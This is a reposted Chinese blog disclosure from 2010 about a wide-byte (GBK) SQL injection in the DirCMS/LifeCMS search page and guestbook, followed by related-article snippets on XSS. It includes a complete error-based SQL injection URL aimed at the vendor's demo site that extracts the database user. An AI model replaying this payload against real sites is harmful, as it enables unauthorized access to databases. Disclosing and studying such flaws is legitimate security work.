dircms宽字节注入漏洞

最新推荐文章于 2020-12-11 08:08:24 发布
最新推荐文章于 2020-12-11 08:08:24 发布
阅读量1.2k 收藏
点赞数
文章标签: date 测试 user sql 2010
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/6361420
版权

//------------------------------------
Name: dircms
Site: www.dircms.net
Desc: 宽字节带来的注入问题
Author: tojen (tojen.me at gmail.com)
Date: 2010/3/8
//--------------------------------------

描述:无意间黑盒发现dircms存在宽字节带来的注入问题,虽然流行过一段时间,貌似现在人们都不太关注这个问题。测试了下发现有俩个地方存在问题:
1http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=&wylx=%BF
    这个就不多说了
    exp:

http://demo.dircms.net/lifecms/search/index.php?type=content&catid=127&xs=%BF'and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x3a)%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23%23


    123.png 
2.http://demo.dircms.net/lifecms/guestbook/index.php?action=post
    这个地方类似于帝国留言本那个宽字节注入,标题和内容处可以利用宽字节带入SQL语句执行

 

Yatere
关注
url存在字节跨站漏洞_CTF自学笔记(三)跨站脚本攻击[二]
weixin_39929465的博客
12-11 753
点击上方蓝字关注!注:本篇文章为个人学习笔记仅供学习交流。防护与绕过1.特定标签过滤任何一种标签,无论是否合法,都可以构造出xss代码。如下:若输出点位于HTML标签的属性中或JavaScript代码中,进行简单地闭合,属性拼接或JavaScript代码拼接,即可执行xss代码。同时HTML5也带来了部分标签,如:具体xss攻击向量可通过http://html5sec.org/参考学习。...
java 字节_字节XSS跨站攻击
weixin_31953847的博客
02-13 793
简介字节跨站漏洞多发生在GB系统编码。 对于GBK编码,字符是由两个字节构成,在%df遇到%5c时,由于%df的ascii大于128,所以会自动拼接%5c,吃掉反斜线。而%27 %20小于ascii(128)的字符就会保留。通常都会用反斜线来转义恶意字符串,但是如果被吃掉后,转义失败,恶意的xss代码可以继续运行。什么是字节GB2312、GBK、GB18030、BIG5、Shift_JIS等这...
url存在字节跨站漏洞_跨站脚本 (XSS)
weixin_39783633的博客
11-30 435
本部分,我们将解释什么是跨站脚本,描述各种类型的跨站脚本漏洞的不同点,并阐明如何查找和防止跨站脚本。什么是跨站脚本 (XSS)跨站脚本是一种允许攻击者破坏用户与易受攻击的应用程序之间交互的网页安全漏洞。它允许攻击者规避相同的同源策略,该策略旨在将不同的网站彼此隔离。跨站脚本漏洞通常允许攻击者伪装成受害者用户,执行用户可以执行的任何操作以及访问用户的任何数据。如果受害者用户具有在应用程序中的特权访问...
url存在字节跨站漏洞_漏洞那些事er 反射型跨站脚本攻击
weixin_39640543的博客
12-10 621
跨站脚本攻击(Cross Site Scripting,缩写为XSS)本质上仍是注入攻击的一种。当实施此类攻击时,攻击者通过直接或间接的方式,向WEB应用提交包含恶意代码数据,而WEB应用未对提交数据进行合法性验证或转义处理,最终致使恶意代码在被攻击者的浏览器中执行。 跨站脚本是所有WEB应用安全漏洞中最常见的一种,一些安全公司的统计数据显示,其数量占据了WE...
url存在字节跨站漏洞_利用WebSocket跨站劫持(CSWH)漏洞接管帐户
weixin_39864738的博客
12-11 288
在一次漏洞悬赏活动中,我发现了一个使用WebSocket连接的应用,所以我检查了WebSocket URL,发现它很容易受到CSWH的攻击(WebSocket跨站劫持)有关CSWH的更多详细信息,可以访问以下链接了解https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html首先,我们假设一个应用是通过以下URL建立web...
DirCMS内容管理系统 v6.0
08-22
作为一款成熟的CMS系统,DirCMS会考虑到安全性问题,可能会内置一些防止SQL注入、XSS攻击的安全机制,并定期更新以应对新的网络安全威胁。 7. **SEO优化**: 为了提升网站的搜索引擎可见性,DirCMS可能包含元标签...
DirCMS内容管理系统 v6.0.zip
最新发布
03-18
DirCMS内容管理系统是一款广泛应用于网站建设和管理的开源系统,尤其适合初学者进行毕业设计和论文研究,以及专业开发者快速构建网站。v6.0版本是该系统的一个重要更新,提供了更多的功能和优化,以满足不同用户的...
DirCMS内容管理系统-PHP
06-21
DirCMS代码全部开源,便于使用者二次开发或定制;并采用简洁的模板标签技术,使制作模板更加容易,一般情况下,用DirCMS架构一个企业站只需半天时间即可,真正实现功能的简洁,实用,强大,灵活。可广泛应用于架构...
易创网站管理系统(DIRCMS) 2011 SP3 UTF8.rar
07-06
DirCMS代码全部开源,便于使用者二次开发或定制;并采用简洁的模板标签技术,使制作模板更加容易,一般情况下,用DirCMS架构一个企业站只需半天时间即可,真正实现功能的简洁,实用,强大,灵活。可广泛应用于架构...
DirCMS内容管理系统源代码
03-18
DirCMS内容管理系统,是国内自主研发的一款功能强大而又不失...DirCMS代码全部开源,便于使用者二次开发或定制;并采用简洁的模板标签技术,使制作模板更加容易,一般情况下,用DirCMS架构一个企业站只需半天时间即可
跨站脚本攻击字符过滤
07-25
用这个办法,可以过滤在输入中含有 % [ ] { } ; & + - " ( ) 的这些字符。
Dircms 地方生活门户系统2009 Sp4 UTF-8.rar
08-30
Dircms 是国内开发的一款操作简便,简单易用的网站内容管理系统,同时也是一个开源的PHP开发框架。采用模块化开发,支持自定义内容模型和会员模型,并且可以自定义字段。正式版V1.0于2010年7月5**正式对外发布。 Dircms国内自主开发的一款永久开源,操作简单的PHP Mysql内容管理系统,其产品之一Lifecms也是用户支持率较高的PHP地方生活门户系统之一,而且其PHP源码也是完全开源的。 更新**期:2010年11月20** 版本名称:Dircms内容管理系统 2009Sp4_UTF-8 1:[增加]栏目模型可修改功能; 2:[增加]在线投票功能[重要]; 3:[增加]站内短信群发功能; 4:[增加]游客每**发帖数量限制功能[重要]; 5:[增加]评论的分类(中评,差评,好评)[重要]; 6:[增加]单页管理功能; 7:[增加]广告位的修改功能,可修改广告位大小; 8:[增加]完美整合UC功能[重要]; 9:[完善]评论审核机制,游客发表评论需审核,会员可直接通过; 10:[修复]管理员角色添加均为超级管理员问题; 11:[修复]会员中心网站公告不显示的问题; 12:[修复]频道的二级**绑定问题; 13:[修复]内容页分页地址错误问题; 14:[修复]某些环境下,安装可能失败的问题; 15:其他功能更新;
Java包含常见web漏洞测试项目
12-06
一个包含web常见漏洞的maven 项目。JDK8 +springMVC+JDBC+mybatis+mysql。使用Eclipse导入maven项目,用sql创建数据库和表,修改数据库连接密码。即可运行。有兴趣的可以研究测试
人工智能在安全漏洞方面的应用_常见的Web安全漏洞测试方法介绍
weixin_39673601的博客
11-21 426
背景介绍Web应用一般是指B/S架构的通过HTTP/HTTPS协议提供服务的统称。随着互联网的发展,Web应用已经融入了我们的日常生活的各个方面。在目前的Web应用中,大多数应用不都是静态的网页浏览,而是涉及到服务器的动态处理。如果开发者的安全意识不强,就会导致Web应用安全问题层出不穷。我们一般说的Web应用攻击,是指攻击者通过浏览器或者其他的攻击工具,在URL或者其他的输入区域(如表单等),向...
url存在字节跨站漏洞_开发者必读篇之Web漏洞防护指南
weixin_39625468的博客
11-29 604
专注于Java领域优质技术,欢迎关注作者:想要好看的 图灵社区本文配图来自美剧《黑客军团 第3季》。web的发展史早期的互联网非常的单调,一般只有静态页面,现在,随着技术的发展,web上大多数站点实际上是web应用程序,在服务器和浏览器之间进行双向的信息传递。他们支持注册登录,金融交易,搜索及用户创作的内容。用户只需要拥有一个浏览器,就能实现各种功能。Web是指一个网站的前端页面到后端服务,比如我...
url存在字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
weixin_39738152的博客
12-04 795
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴周五晚上好~终于到了XSS漏洞的完结篇啦~~感觉本公众号写的最多的就是XSS,现在可以告一段落了...让我们来看看第一版XSS漏洞总结吧!Part.0目录目录一、XSS概述什么是XSS?二、XSS的分类XSS的三种类型反射型XSS存储型XSSDOM型XSSDVWA平台通关三、XSS的利用利用XSS盗取用户cookie利用XSS进行网页...
检测到目标url存在字节跨站漏洞_通用型漏洞审计浅析
weixin_39844426的博客
12-08 1301
一次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network安全漏洞审计,作为扫描器的核心功能,会告诉扫描器如何去检测和审计漏洞。它可以看作扫描器的大脑,通过对每一种漏洞进行场景化学习,从中提取漏洞的扫描特征,将其存储到扫...
url存在字节跨站漏洞_CWE Top1跨站脚本漏洞安全研究
weixin_39785723的博客
11-30 294
CWE(Common WeaknessEnumeration,通用缺陷枚举)是由MITRE公司维护的一个通用软件和硬件缺陷类型的列表。CWE列表首次发布于2006年,主要关注软件漏洞。近年来,随着工业控制系统、医疗设备、汽车、可穿戴设备的发展,硬件安全问题成为企业IT、OT的关注点,于是在2020年CWE列表中增加了硬件漏洞。软件和硬件的缺陷严重程度使用常见缺陷评分系统(CWSS)和常见...
url存在字节跨站漏洞_前端XSS漏洞攻击竟然这么厉害
weixin_39917291的博客
12-03 456
你好,是我琉忆。今天我们聊聊作为开发都可能会遇到的XSS漏洞攻击。如果你不知道这个漏洞,那么你编写的代码多数可能存在问题,可能一不小心就中招。为什么会突然聊这个呢,是因为这个XSS漏洞在大部分的网站中都存在。即使是知名的网站也没有避免中招(等下罗列相应的网站)。那么XSS漏洞到底是什么?它是如何攻击的?我们应该如何防御?01XSS攻击是什么?XSS攻击:跨站脚本攻击(Cross Site...
url存在字节跨站漏洞_5分钟速览丨常见的Web安全漏洞测试方法
weixin_39548832的博客
12-04 1164
中秋小长假“余额”就剩半天了尽管心里有太多不舍也要调整自己毕竟假期都是短暂的工作才是职场人生的常态为了尽快消除“假日综合症”e小安贴心送上小文一篇小伙伴们赶紧“脉动”回来吧各类web应用充斥在我们的网络生活中,但是因为开发者安全意识不强而导致的安全问题同样层出不穷,毕竟仅仅依靠个人编写代码总会有考虑不周全的时候。一旦这些WEB漏洞被黑客攻击者利用,他可以轻易控制整个网站,并可进一步提权获...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值